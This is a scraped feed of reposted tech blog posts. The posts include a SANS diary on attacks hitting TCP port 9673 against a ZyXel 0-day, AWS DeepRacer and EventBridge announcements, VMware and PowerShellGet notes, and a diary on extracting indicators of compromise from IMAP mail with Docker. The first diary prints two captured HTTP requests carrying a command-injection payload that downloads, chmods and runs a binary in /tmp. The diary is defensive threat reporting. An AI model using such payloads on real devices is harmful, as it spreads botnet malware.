Attack traffic on TCP port 9673, (Fri, May 1st)

This post was originally published on this site

I don’t know how many of you pay attention to the Top 10 Ports graphs on your dashboard, but I do. Unfortunately, the top 10 is pretty constant, the botnets are attacking the same ports. What I find more interesting is anomalous behavior. Changes from what is normal on a given port. So, a little over a week ago, I saw a jump on a port I wasn’t familiar with.

In fact, when I look at the longer term, we’ve seen the occasional spike, but this is the first one where the number of sources was up significantly, too.

So, what are the attackers looking for in this last week? Well, as I have in previous diaries, I turned to fellow handler, Didier Stevens’ tcp-honeypot. Since there seem to be web admin consoles on lots of ports, I set up tcp port 9673 to look like a web server, though it probably wasn’t necessary. I brought this up on a VPS I have and within minutes started getting hits (I have included 2 examples below). With a little DuckDuckGo-ing, I came across an advisory for a ZyXel 0-day from last month. I guess someone finally decided to go after it. I was unable to download the second stage (it looks like the servers hosting the payloads may have been shut down already), but according to Radware, this is the Hoaxcalls DDoS botnet in action.

20200429-051959: data b”GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1rnUser-Agent: XTCrnHost: 1000rnAccept-Encoding: gzip, deflaternAccept-Language: en-US,en;q=0.9rnrncpe_ids=__import__(‘os’).system(‘wget -O /tmp/viktor; chmod 777 /tmp/viktor; /tmp/viktor’)rnrn”

20200430-082737: data b”GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1rnUser-Agent: XTCrnHost: 1000rnAccept-Encoding: gzip, deflaternAccept-Language: en-US,en;q=0.9rnrncpe_ids=__import__(‘os’).system(‘wget -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug’)rnrn”

As we always say, your IoT devices should not generally be directly exposed to the internet. I know people are fond of saying the perimeter is dead, but seriously, you should still have a firewall that blocks inbound traffic to (at least) your IoT devices.

Jim Clausing, GIAC GSE #26
jclausing –at– isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Join the FORMULA 1 DeepRacer ProAm Special Event

This post was originally published on this site

The AWS DeepRacer League gives you the opportunity to race for prizes and glory, while also having fun & learning about reinforcement learning. You can use the AWS DeepRacer 3D racing simulator to build, train, and evaluate your models. You can review the results and improve your models in order to ensure that they are race-ready.

Winning a FORMULA 1 (F1) race requires a technologically sophisticated car, a top-notch driver, an outstanding crew, and (believe it or not) a healthy dose of machine learning. For the past couple of seasons AWS has been working with the Formula 1 team to find ways to use machine learning to make cars that are faster and more fuel-efficient than ever before (read The Fastest Cars Deserve the Fastest Cloud and Formula 1 Works with AWS to Develop Next Generation Race Car to learn more).

Special Event
Each month the AWS DeepRacer League runs a new Virtual Race in the AWS DeepRacer console and this month is a special one: the Formula 1 DeepRacer ProAm Special Event. During the month of May you can compete for the opportunity to race against models built and tuned by Formula drivers and their crews. Here’s the lineup:

Rob Smedley – Director of Data Systems for F1 and AWS Technical Ambassador.

Daniel Ricciardo – F1 driver for Renault, with 7 Grand Prix wins and 29 podium appearances.

Tatiana Calderon – Test driver for the Alfa Romeo F1 team and 2019 F2 driver.

Each pro will be partnered with a member of the AWS Pit Crew tasked with teaching them new skills and taking them on a learning journey. Here’s the week-by-week plan for the pros:

Week 1 – Learn the basics of reinforcement learning and submit models using a standard, single-camera vehicle configuration.

Week 2 – Add stereo cameras to vehicles and learn how to configure reward functions to dodge debris on the track.

Week 3 – Add LIDAR to vehicles and use the rest of the month to prepare for the head-to-head qualifier.

At the end of the month the top AWS DeepRacer amateurs will face off against the professionals, in an exciting head to head elimination race, scheduled for the week of June 1.

The teams will be documenting their learning journey and you’ll be able to follow along as they apply real-life racing strategies and data science to the world of autonomous racing.

Bottom line: You have the opportunity to build & train a model, and then race it against one from Rob, Daniel, or Tatiana. How cool is that?

Start Your Engines
And now it is your turn. Read Get Started with AWS DeepRacer, build your model, join the Formula 1 DeepRacer ProAm Special Event, train it on the Circuit de Barcelona-Catalunya track, and don’t give up until you are at the top of the chart.

Training and evaluation using the DeepRacer Console are available at no charge for the duration of the event (Terms and Conditions apply), making this a great opportunity for you to have fun while learning a useful new skill.

Good luck, and see you at the finish line!



New – Amazon EventBridge Schema Registry is Now Generally Available

This post was originally published on this site

Amazon EventBridge is a serverless event bus that makes it easy to connect applications together. It can use data from AWS services, your own applications, and integrations with Software-as-a-Service (SaaS) partners. Last year at re:Invent, we introduced in preview EventBridge schema registry and discovery, a way to store the structure of the events (the schema) in a central location, and simplify using events in your code by generating the code to process them for Java, Python, and Typescript.

Today, I am happy to announce that the EventBridge schema registry is generally available, and that we added support for resource policies. Resource policies allow to share a schema repository across different AWS accounts and organizations. In this way, developers on different teams can search for and use any schema that another team has added to the shared registry.

Using EventBridge Schema Registry Resource Policies
It’s common for companies to have different development teams working on different services. To make a more concrete example, let’s take two teams working on services that have to communicate with each other:

  • The CreateAccount development team, working on a frontend API that receives requests from a web/mobile client to create a new customer account for the company.
  • the FraudCheck development team, working on a backend service checking the data for newly created accounts to estimate the risk that those are fake.

Each team is using their own AWS account to develop their application. Using EventBridge, we can implement the following architecture:

  • The frontend CreateAccount applications is using the Amazon API Gateway to process the request using a AWS Lambda function written in Python. When a new account is created, the Lambda function publishes the ACCOUNT_CREATED event on a custom event bus.
  • The backend FraudCheck Lambda function is built in Java, and is expecting to receive the ACCOUNT_CREATED event to call Amazon Fraud Detector (a fully managed service we introduced in preview at re:Invent) to estimate the risk of that being a fake account. If the risk is above a certain threshold, the Lambda function takes preemptive actions. For example, it can flag the account as fake on a database, or post a FAKE_ACCOUNT event on the event bus.

How can the two teams coordinate their work so that they both know the syntax of the events, and use EventBridge to generate the code to process those events?

First, a custom event bus is created with permissions to access within the company organization.

Then, the CreateAccount team uses EventBridge schema discovery to automatically populate the schema for the ACCOUNT_CREATED event that their service is publishing. This event contains all the information of the account that has just been created.

In an event-driven architecture, services can subscribe to specific types of events that they’re interested in. To receive ACCOUNT_CREATED events, a rule is created on the event bus to send those events to the FraudCheck function.

Using resource policies, the CreateAccount team gives read-only access to the FraudCheck team AWS account to the discovered schemas. The Principal in this policy is the AWS account getting the permissions. The Resource is the schema registry that is being shared.

  "Version": "2012-10-17",
  "Statement": [
      "Sid": "GiveSchemaAccess",
      "Effect": "Allow",
      "Action": [
      "Principal": {
        "AWS": "123412341234"
      "Resource": [

Now, the FraudCheck team can search the content of the discovered schema for the ACCOUNT_CREATED event. Resource policies allow you to make a registry available across accounts and organizations, but they will not automatically show up in the console. To access the shared registry, the FraudCheck team needs to use the AWS Command Line Interface (CLI) and specify the full ARN of the registry:

aws schemas search-schemas 
    --registry-name arn:aws:schemas:us-east-1:432143214321:registry/discovered-schemas 
    --keywords ACCOUNT_CREATED

In this way, the FraudCheck team gets the exact name of the schema created by the CreateAccount team.

    "Schemas": [
            "RegistryName": "discovered-schemas",
            "SchemaArn": "arn:aws:schemas:us-east-1:432143214321:schema/discovered-schemas/CreateAccount@ACCOUNT_CREATED",
            "SchemaName": “CreateAccount@ACCOUNT_CREATED",
            "SchemaVersions": [
                    "CreatedDate": "2020-04-28T11:10:15+00:00",
                    "SchemaVersion": 1

With the schema name, the FraudCheck team can describe the content of the schema:

aws schemas describe-schema 
    --registry-name arn:aws:schemas:us-east-1:432143214321:registry/discovered-schemas 
    --schema-name CreateAccount@ACCOUNT_CREATED

The result describes the schema using the OpenAPI specification:

    "Content": "{"openapi":"3.0.0","info":{"version":"1.0.0","title":"CREATE_ACCOUNT"},"paths":{},"components":{"schemas":{"AWSEvent":{"type":"object","required":["detail-type","resources","detail","id","source","time","region","version","account"],"x-amazon-events-detail-type":"CREATE_ACCOUNT","x-amazon-events-source":”CreateAccount","properties":{"detail":{"$ref":"#/components/schemas/CREATE_ACCOUNT"},"account":{"type":"string"},"detail-type":{"type":"string"},"id":{"type":"string"},"region":{"type":"string"},"resources":{"type":"array","items":{"type":"object"}},"source":{"type":"string"},"time":{"type":"string","format":"date-time"},"version":{"type":"string"}}},"CREATE_ACCOUNT":{"type":"object","required":["firstName","surname","id","email"],"properties":{"email":{"type":"string"},"firstName":{"type":"string"},"id":{"type":"string"},"surname":{"type":"string"}}}}}}",
    "LastModified": "2020-04-28T11:10:15+00:00",
    "SchemaArn": "arn:aws:schemas:us-east-1:432143214321:schema/discovered-schemas/CreateAccount@CREATE_ACCOUNT",
    "SchemaName": “CreateAccount@ACCOUNT_CREATED",
    "SchemaVersion": "1",
    "Tags": {},
    "Type": "OpenApi3",
    "VersionCreatedDate": "2020-04-28T11:10:15+00:00"

Using the AWS Command Line Interface (CLI), the FraudCheck team can create a code binding if it isn’t already created, using the put-code-binding command, and then download the code binding to process that event:

aws schemas get-code-binding-source 
    --registry-name arn:aws:schemas:us-east-1:432143214321:registry/discovered-schemas 
    --schema-name CreateAccount@ACCOUNT_CREATED 
    --language Java8

Another option for the FraudCheck team is to copy and paste (after unescaping the JSON string) the Content of the discovered schema to create a new custom schema in their AWS account.

Once the schema is copied to their own account, the FraudCheck team can use the AWS Toolkit IDE plugins to view the schema, download code bindings, and generate serverless applications directly from their IDEs. The EventBridge team is working to add the capability to the AWS Toolkit to use a schema registry in a different account, making this step simpler. Stay tuned!

Often customers have a specific team, with a different AWS account, managing the event bus. For the sake of simplicity, in this post I assumed that the CreateAccount team was the one configuring the EventBridge event bus. With more accounts, you can simplify permissions using IAM to share resources with groups of AWS accounts in AWS Organizations.

Available Now
The EventBridge Schema Registry is available now in all commercial regions except Bahrain, Cape Town, Milan, Osaka, Beijing, and Ningxia. For more information on how to use resource policies for schema registries, please see the documentation.

Using Schema Registry resource policies, it is much easier to coordinate the work of different teams sharing information in an event-driven architecture.

Let me know what are you going to build with this!


VMware vCenter 6.7 Update 3g and ESXi 6.7 patch Released

This post was originally published on this site

VMware has released vCenter 6.7 Update 3g, and also a new patch for ESXi 6.7 Update 3 P02. vCenter 6.7 Update 3g What’s new: New alarms in vCenter Server: vCenter Server 6.7 Update 3g adds a Replication State Change alarm to the vCenter Server Appliance with an Embedded Platform Services Controller that displays when a replication state changes to […]

Integrate VMware Cloud on Dell EMC with Your Enterprise Infrastructure via AD Authentication and Hybrid Linked Mode

This post was originally published on this site

Get the most out of VMware Cloud on Dell EMC – enable unique administrator logins and simplify workload migration and deployment with Hybrid Linked Mode (HLM)

The post Integrate VMware Cloud on Dell EMC with Your Enterprise Infrastructure via AD Authentication and Hybrid Linked Mode appeared first on VMware vSphere Blog.

PowerShellGet 3.0 Preview 2

This post was originally published on this site

PowerShellGet 3.0 preview 2 is now available on the PowerShell Gallery.
The focus of this release is the Install-PSResource parameter, error messages, and warnings.
For a full list of the issues addressed by this release please refer to this GitHub project.

Note: For background information on PowerShellGet 3.0 please refer to the blog post for the first preview release.

How to install the module

To install this version of PowerShellGet open any PowerShell console and run:
Install-Module -Name PowerShellGet -AllowPrerelease -Force -AllowClobber

New Features of this release

  • Progress bar and -Quiet parameter for Install-PSResource
  • TrustRepository parameter for Install-PSResource
  • NoClobber parameter for Install-PSResource
  • AcceptLicense for Install-PSResource
  • Force parameter for Install-PSResource
  • Reinstall parameter for Install-PSResource
  • Improved error handling

What is next

GitHub is the best place to track the bugs/feature requests related to this module. We have used a combination of projects and labels on our GitHub repo to track issues for this upcoming release. We are using the label Resolved-3.0 to mark issues that we plan to release at some point before we release the module as GA (generally available). To track issues/features to particular preview and GA releases we are using GitHub projects which are titled to reflect the release.

The major feature for our next preview release (preview 3) is allowing for Install-PSResource to accept a path to a psd1 or, json file (using -RequiredResourceFile), or a hashtable or json an input (using -RequiredResource).

How to Give feedback and Get Support

We cannot overstate how critical user feedback is at this stage in the development of the module. Feedback from preview releases help inform design decisions without incurring a breaking change once generally available and used in production. In order to help us to make key decisions around the behavior of the module please give us feedback by opening issues in our GitHub repository.

Sydney Smith
PowerShell Team

The post PowerShellGet 3.0 Preview 2 appeared first on PowerShell.

Collecting IOCs from IMAP Folder, (Thu, Apr 30th)

This post was originally published on this site

I’ve plenty of subscriptions to “cyber security” mailing lists that generate a lot of traffic. Even if we try to get rid of emails, that’s a fact: email remains a key communication channel. Some mailing lists posts contain interesting indicators of compromize. So, I searched for a nice way to extract them in an automated way (and to correlate them with other data). I did not find a solution ready to use that matched my requirements:

  • Connect to any mailbox (preferably via IMAP)
  • Produce data easy to process (JSON)
  • Be easy to deploy (Docker)

So, I built my own Docker image… It is based on the following components:

  • procmail
  • getmail
  • some Python libraries
  • The project es_mail_intel[1]

The last tool is an old project that achieves exactly why I expect: It extracts IOCs from emails and stores them in ElasticSearch. But, if you don’t want ElasticSearch, it can also produce a JSON file! Parsing emails is a pain! So, I did not want to write my own parser.

Data are processed in this way: Emails are fetched via IMAP at regular intervals by getmail and pushed to procmail. It pushes them to the Python script that extracts interesting data.

IMAP data >> getmail >> procmail >> >> JSON data

Here is my Dockerfile:

FROM ubuntu:18.04
MAINTAINER Xavier Mertens <>
RUN apt-get update && 
    DEBIAN_FRONTEND=noninteractive apt-get install --no-install-recommends -y 
    apt-get clean && 
    rm -rf /var/lib/apt/lists/*
RUN mkdir -p /root/.getmail
RUN git clone /opt/es_email_intel
COPY getmail.conf /
RUN echo ":0" >>/procmailrc
RUN echo "|/opt/es_email_intel/ 2 >>/log/ioc.json" >>/procmailrc
RUN chmod u+x /
RUN touch /tmp/firstboot
CMD ["/"]

It needs a getmail.conf with the parameters of the mailbox you’d like to monitor:

type = SimpleIMAPSSLRetriever
server = CONF_SERVER
username = CONF_LOGIN
password = CONF_PASSWORD

type = MDA_external
path = /usr/bin/procmail
user = getmail
group = getmail
arguments = ('/procmailrc', )


getmail is a very powerful tool with plenty of options. Just have a look at the documentation[2] to find your best way to interact with your mailboxes. The script ‘’ will be executed by the container and, at first boot, configure your credentials:

if [ -r /tmp/firstboot ]; then
        sed -i "s|CONF_SERVER|$IMAP_SERVER|g" /getmail.conf
        sed -i "s|CONF_LOGIN|$IMAP_USER|g" /getmail.conf
        sed -i "s|CONF_PASSWORD|$IMAP_PASS|g" /getmail.conf

        groupadd getmail
        useradd -u $UID -g getmail -d /home/getmail getmail
        mkdir /home/getmail && chown getmail:getmail /home/getmail
        test -d /log || mkdir /log
        touch /log/getmail.log /log/ioc.json
        chown -R root:getmail /log
        chmod -R g+w /log
        rm /tmp/firstboot
while true
        /usr/bin/getmail -r /getmail.conf
        sleep $IMAP_WAIT

And, finally, my docker-compose.yml file:

version: '3'
        build: .
        image: "xme/iocollector"
        restart: always
        hostname: iocollector
        container_name: iocollector
            - /etc/localtime:/etc/localtime:ro
            - /data/iocollector/log:/log
            - UID=1000
            - IMAP_SERVER=<server_ip_or_fqdn>
            - IMAP_USER=<username>
            - IMAP_PASS=<password>
            - IMAP_WAIT=30
        network_mode: bridge

Start your docker and it will populate the mapped /log directory with an ‘ioc.json’ file:

    "bitcoin_wallet": [
    "ctime": "Thu Mar  5 17:54:23 2020",
    "domain": [
    "email": [
    "epoch": "1583427263",
    "filename": [
    "ipv4": [
    "md5": [],
    "message_text": "...",
    "mutex": [],
    "sha1": [],
    "sha256": [
    "ssdeep": [],
    "url": [

Note: The complete is email is parsed. You will find in the JSON file all SMTP headers, the email body, etc. Less relevant for IOC’s but still interesting in some cases (by example, to analyze spam).

Here is a recap of the data flow:


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

PowerCLI – Backup and Restore ESXi Configuration (works with vSphere 7)

This post was originally published on this site

As you may recall from previous posts and general best practice in VMware environments, it is a good idea to perform a regular backup of both your vCenter and your ESXi host configuration.  Having these backups in place can certainly reduce the downtime in the event of an issue, and help to ease the recovery. Other blog posts have taken […]